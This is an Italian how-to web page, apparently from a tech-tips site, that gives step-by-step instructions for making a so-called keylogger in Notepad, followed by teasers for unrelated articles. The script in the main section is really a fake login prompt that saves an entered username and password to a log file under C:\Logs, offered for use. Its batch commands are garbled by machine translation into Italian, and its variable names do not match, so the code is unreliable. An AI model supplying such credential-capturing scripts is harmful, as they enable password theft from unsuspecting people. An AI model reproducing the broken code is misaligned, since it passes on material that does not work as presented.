Come creare un Keylogger utilizzando il Blocco note

Come creare un Keylogger utilizzando il Blocco note

Un keylogger è un tipo di software di monitoraggio in grado di registrare tutte le sequenze di tasti (operazioni sulla tastiera) eseguite per creare un file di registro, spesso crittografato. Ogni tipo di keylogger è pericoloso perché può registrare i tasti premuti, tenere traccia di tutte le tue attività e registrare i siti aperti.

In questo modo, qualsiasi dei tuoi account può rientrare nel raggio d'azione degli hacker. I keylogger possono rilevare e rilevare la password del tuo conto bancario. E altri tipi di keylogger possono essere creati anche utilizzando Blocco note.

Nell'articolo seguente, LuckyTemplates ti guiderà attraverso i passaggi per creare un Keylogger utilizzando il Blocco note.

Passaggi per creare Keylogger utilizzando il Blocco note:

Passo 1:

Innanzitutto, apri Blocco note sul tuo computer premendo il tasto Windows, quindi seleziona Blocco note .

Quindi copia e incolla il codice seguente nel Blocco note:

@eco disattivato

colore a

titolo Accedi

cls

echo Inserisci il tuo indirizzo e-mail e la password

eco. eco.

eco. eco.

cd “C:Logs”

imposta /p utente=Nome utente:

imposta /p password=Password:

echo Nome utente=”%utente%” Password=”%pass%” >> Log.txt

avvia >>Programma qui

uscire. uscire

Passo 2:

Come creare un Keylogger utilizzando il Blocco note

Salva il file del Blocco note come Logs.bat e salvalo sul desktop per un riconoscimento più semplice.

Passaggio 3:

Come creare un Keylogger utilizzando il Blocco note

Quindi crea una nuova cartella, chiama questa cartella logs. (nota che il keylogger funziona solo se la tua cartella si chiama logs). Taglia la cartella appena creata, quindi incollala nell'unità C.

Passaggio 4:

Come creare un Keylogger utilizzando il Blocco note

Successivamente, controlla il file Log.bat , quindi inserisci il nome utente e la password.

Passaggio 5:

Come creare un Keylogger utilizzando il Blocco note

Aprire la cartella nell'unità C , quindi visualizzare tutti i registri delle chiavi salvati come file di testo generati automaticamente.

Fare riferimento ad alcuni altri articoli di seguito:

  • Trolla gli amici creando virus "falsi" sul Blocco note

Buona fortuna!


Attacco wormhole nelle reti di sensori wireless

Attacco wormhole nelle reti di sensori wireless

L'attacco wormhole è un tipo di attacco a livello di rete effettuato utilizzando più nodi dannosi. I nodi utilizzati per effettuare questo attacco sono superiori ai nodi normali e sono in grado di stabilire canali di comunicazione migliori a lungo raggio.

Come montare il file system Linux utilizzando WSL2 su Windows 10

Come montare il file system Linux utilizzando WSL2 su Windows 10

A partire dalla build 20211, il sottosistema Windows per Linux 2 (WSL2) include una nuova funzionalità che consente di collegare e montare unità fisiche per accedere ai file system Linux (come ext4) che non sono supportati. Supporto su Windows 10.

Come risolvere i problemi con le configurazioni multi-monitor in Windows

Come risolvere i problemi con le configurazioni multi-monitor in Windows

Potrebbero esserci momenti in cui potresti riscontrare problemi relativi al secondo schermo. Ecco alcuni suggerimenti che puoi utilizzare per risolvere il problema.

Ripristina il Blocco note allo stato di impostazione predefinito originale

Ripristina il Blocco note allo stato di impostazione predefinito originale

Blocco note è una delle applicazioni più utilizzate sul sistema operativo Windows. Durante l'uso, il carattere del Blocco note viene modificato, presenta errori, la dimensione della finestra del Blocco note viene modificata e alcuni altri errori. Pertanto, per correggere l'errore, è necessario ripristinare il Blocco note allo stato di impostazione predefinito originale.

Cose da sapere su Chaos: nuovo ransomware pericoloso

Cose da sapere su Chaos: nuovo ransomware pericoloso

Da giugno 2021, i ricercatori di Trend Micro monitorano Chaos, uno sviluppatore di ransomware in fase di sviluppo. Il programma, offerto sui forum di hacker clandestini, è pubblicizzato come una nuova versione di Ryuk, che l'FBI una volta descrisse come il ransomware più redditizio della storia.

Configura il routing statico tra il router e unaltra rete

Configura il routing statico tra il router e unaltra rete

Il routing statico è una funzionalità avanzata sui router Linksys che consente di controllare le capacità di routing del router. Questo non è adatto per il normale utilizzo di Internet perché il router non sarà in grado di instradare automaticamente gli indirizzi dei siti web.

Come eseguire MS Edge e aprire gli URL dalla riga di comando

Come eseguire MS Edge e aprire gli URL dalla riga di comando

Il browser Microsoft Edge supporta l'apertura da uno strumento da riga di comando come il prompt dei comandi. Questo è il comando per eseguire il browser Edge dalla riga di comando.

Analizza le violazioni dei dati con i 10 migliori strumenti di informatica forense

Analizza le violazioni dei dati con i 10 migliori strumenti di informatica forense

Negli ultimi anni, l’informatica forense è emersa come un aspetto particolarmente importante nel campo dell’informatica in generale e dell’investigazione in particolare.

Gli 8 migliori software di gestione e monitoraggio dellarchiviazione

Gli 8 migliori software di gestione e monitoraggio dellarchiviazione

I sistemi di gestione dello storage forniscono inoltre dati storici sulle prestazioni e sulla disponibilità per identificare e apprendere dai problemi passati e attuali.

Lo smartphone è dotato di software antivirus?

Lo smartphone è dotato di software antivirus?

Usiamo i nostri smartphone per connetterci a Internet e scaricare software e file, il che significa che sono esposti ad attività dannose. Quindi gli smartphone sono dotati di software antivirus o è necessario installare autonomamente un programma di protezione?